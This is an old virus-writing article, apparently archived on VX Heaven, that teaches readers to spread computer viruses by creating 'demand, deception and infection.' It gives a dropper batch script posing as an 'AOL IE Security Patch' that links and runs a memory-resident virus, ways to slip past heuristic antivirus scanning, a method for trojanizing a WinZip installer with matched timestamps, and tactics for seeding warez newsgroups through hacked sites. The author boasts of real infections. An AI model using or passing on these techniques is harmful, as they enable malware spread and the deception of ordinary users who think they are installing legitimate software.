VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Theory Of Better File Virus Distribution (a study in new ideas?)


[Back to index] [Comments]

Ok so you managed to get over your first hurdle, you managed to make/hack/remix a memory resident *.com file infecting virus. Congratulations! I mean that wholeheartedly. So now what? Did you spend all that time learning and debugging .asm files just so it would sit on your HD? No? I didn't think so. So what's your next move? DISTRIBUTION!

The first rule of distribution for a file infector is demand. You must create a demand or use a program that is in demand as a host. Without demand your file will never be downloaded or run. Second, deception! You must be able to get your virus past most AV products or you will never get a chance to infect. How is your code? Can you sneak by heuristics? You will need a way to sneak your virus passed the most common AV programs, even if you're heuristically challenged. Can that be done? Yes, a clever dropper can do that. How? .... read on. Third, infection! Infect on the first run! This also requires a decently clever dropper. What good is a memory resident *.com infecting virus if it's run and then no .com files are run the entire time it's resident. Then *poof* someone shuts off the computer and never runs your dropper again? That would be fine if you had written a multipartite virus but for this first example we are concentrating on a beginners virus, a basic *.com memory resident file infector.

Ok so I say that Virus Distribution consists of three basic components: DEMAND, DECEPTION and INFECTION. Am I right? Is this a sound theory? Well let me back up my theory with an example or two.


The Virus: *.com memory resident file infector. ( Tools Needed: Tlink, Bat2exe, the virus.obj file (you can find Bat2exe from if you don't already have it and you must already have Tlink and the .obj file if you wrote the virus!)

Ok so you have everything you need and you're just dying to infect the world. Ok, give it some thought. Think "DEMAND." In this example we will capitalize on a current issue and create demand. In this case we dream up an "AOL IE 3.0 Security Patch" and our method of distribution will be AOL and USENET. You see, I have already done this. When AOL had their big crash I created an Anti-Crash "AOL Approved" Downloadable Patch. You say no one would ever fall for that :) .. yea right! So I just retooled that idea for "right now" - AOL only came out with a patch for their IE integrated browser on 7-7-97 :) .... Anticipate demand, create demand or capitalize on demand. Ok so now everyone who uses AOL will want to be secure, and you have made a program that is in demand. With demand out of the way we need to concentrate on deception. Now, most computer users are not that bright but they know better than to just run a .bat file - hell I have even heard that some computer users even know how to view .bat files and look for suspicious content! So we will hide our .bat file in a .com. (realistically though your chance won't drop that much if you just leave it as a .bat)

Ok lets make that dropper!

   aol_ie.bat : 
   echo Press any key to update your Internet Explorer For America Online 
   patch /t patch.obj ;link the virus 
   patch ;run the virus 
   command ;call for infection 

   bat2exe your aol_ie.bat - it will result in [you can skip this part if you have to] 
   Package your files into a nice .zip or if you want you can use a self extracting compression program but use one with an icon!! (WinZip or RAR) [icons calm new 
   computer user's nerves!] 

So your zip will contain:

patch.exe [why did you rename tlink.exe? patch goes with the flow better than tlink.exe and will not arouse suspicion]

patch.obj [why did you rename virus.obj? also goes with the flow better] [the dropper .bat converted to .com]

readme.txt [be creative here!!]

*** [EXTRA] Take it a bit further! . If you want to you can add a few extra steps like creating a .pif for your .com [or .bat] or by including a hidden .ico or .dll file to go along with your .pif . use your imagination ***

*** [EXTRA] Take it a bit further! ... You can also fatten up your zip with miscellaneous files of varying size renamed to patch.dat or something equally innocuous ***

*** [Snag?] Did we hit a snag? . What if they view these files with a hex editor or text editor? No problem - all they will see is the inside of tlink.exe or some commands in like patch and pause, certainly nothing to be alarmed about :) ***

So is the deception complete? More than you may realize. They downloaded your zip and scanned it. They did a deep or heuristic scan!!! Are you worried? Should you worry because your virus is heuristically challenged? Not really - you have a 75% better chance of beating heuristics in .obj form :) ... don't believe me? Test that one yourself. Also your has the pause command in it. What virus pauses before it infects? Do you know of one? It doesn't make logical sense ... that's why we do it.

Finally, we need instant infection. Wait, that's already done. Did you catch it? The third to last line in our bat links the viral code and creates the actual virus. The second to last line runs our virus which, in turn goes memory resident. Then the last line of our very simple dropper runs We just went memory resident and then got! Hell that means that even if our user has Win95 we still get a chance to go active every time they invoke a DOS Prompt or Shut Down To DOS. Also our heuristically challenged virus wasn't even created until after the download was scanned and no current AV programs (that I know of) support heuristics in their memory esident scanner!

So in example #1 I demonstrated how some thought and ingenuity combined with my theory of "Better Distribution" can increase your chances of infecting a new machine and spreading. Example #1 only deals with a very simple virus and limited targets (how many .com files can you find on your system?) ... but our mission was to increase the chances of infection and survival and we did that 10 fold!!

Ok, do you subscribe to my theory of Better Distribution yet? No? I'll try once again with a more complex virus and a totally different angle, but sticking to the main points of my theory : DEMAND, DECEPTION and INFECTION!


The Virus: *.exe (Windows EXE) non-memory resident file infector. (virus.exe) Tools Needed: A current or new beta release of a popular Windows program.

Ok let's start! Mission number one? DEMAND! For this example let's use the latest greatest release of WinZip (beta or otherwise). That should take care of demand - everyone wants a new FREE version of WinZip. It's a good universal program to use just like pkzip was a few years ago.

As you just saw demand takes care of itself if you just put a little thought into it. Lets see if DECEPTION will do the same thing. How do you infect WinZip? Well, since this a more advanced example I will just assume that I don't have to show you how to infect a file. But, I will tell you to test your work! Think! The WinZip setup program is a lot more complex than any dropper .bat file we can construct so be sure to test your infection. For example I have done the WinZip thing and the Setup.exe for the 16bit WinZip has to have the exact same time/date stamp as the readme.txt. You may have made a successful infection but your deception will fail if the infected program screams that time/date stamps don't match! So with the more complex programs deception takes a bit more thought. Does the deception end here? No. How will you distribute this virus in a deceptive way? If you follow the normal route of distribution for a new virus that is attached to a new ware then you would just post the zip to alt.binaries.warez and all other warez-related newsgroups. Well, that's great but Dr Solly scans most binary newsgroups and posts virus alerts and instant fixes. So in one day you can be found, named and have a remover. That is the worst thing that could ever happen to a new virus! So what's there to do? Well either scam some warez web sites or warez traders into taking your file if it's legit (but infected) or do what I do/did and post to all those USENET warez related newsgroups with a LINK to some hacked out ftp or web site where the file is stored!! No one bothers to follow all warez links and scan them. Shit, I did this for one of my files and hid a counter on the site . it reached 553 before Geocities threw me off for distributing registered software. Now think about that - I took a new, not named and currently unscannable virus and had 500+ people seek it out (and run it?). For deceptive distribution that was a slam-dunk!

Ok now how did my INFECTION take care of itself? I chose a setup.exe!!! You have to choose your carriers wisely. A setup program usually runs all over and infects the program that it is setting up, in this case WinZip. Plus, WinZip is an often used program which greatly increases your chances of survival and any self extracting archives will be carriers or my virus!

Are you now convinced that my "Theory of Better Distribution" is the way to attack your next world wide virus infection? I hope so.

Boot sector virii don't have to rule the world of distribution (and the Wild List!) - think hard and you will figure out new and ingenious ways to make someone want your virus. I hope that I have made you think a bit harder about what you're going to do the next time that you decide to distribute one of your virii. Hopefully you will never again just upload some "new patch" for some obscure program to a local BBS and pray that your virus makes it around the world. If this was 1989 then you may have had a chance but remember that you have to think about now. Also, don't think you can just upload sex.exe to alt.binaries.erotica. Few people are stupid enough for run an .exe from a porn newsgroups (though I believe some are - just not enough of them to count).

Once again remember you have to think about now, don't take into account how they used to do it! Think about how you can do it now! How do you get files now? What programs do you want now? What makes you suspicious now?

Remember unless you still want to live that "I just write virii for research" lie then you need to think as hard about your distribution as you did on making your multipartite encrypted armored polymorphic stealth tunneling memory resident Windows 95 virus!!!

Peace, VicodinES

Ps. I also recommend you get the Nowhere Utilities by Nowhere Man! Fucking great tools for deception!

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka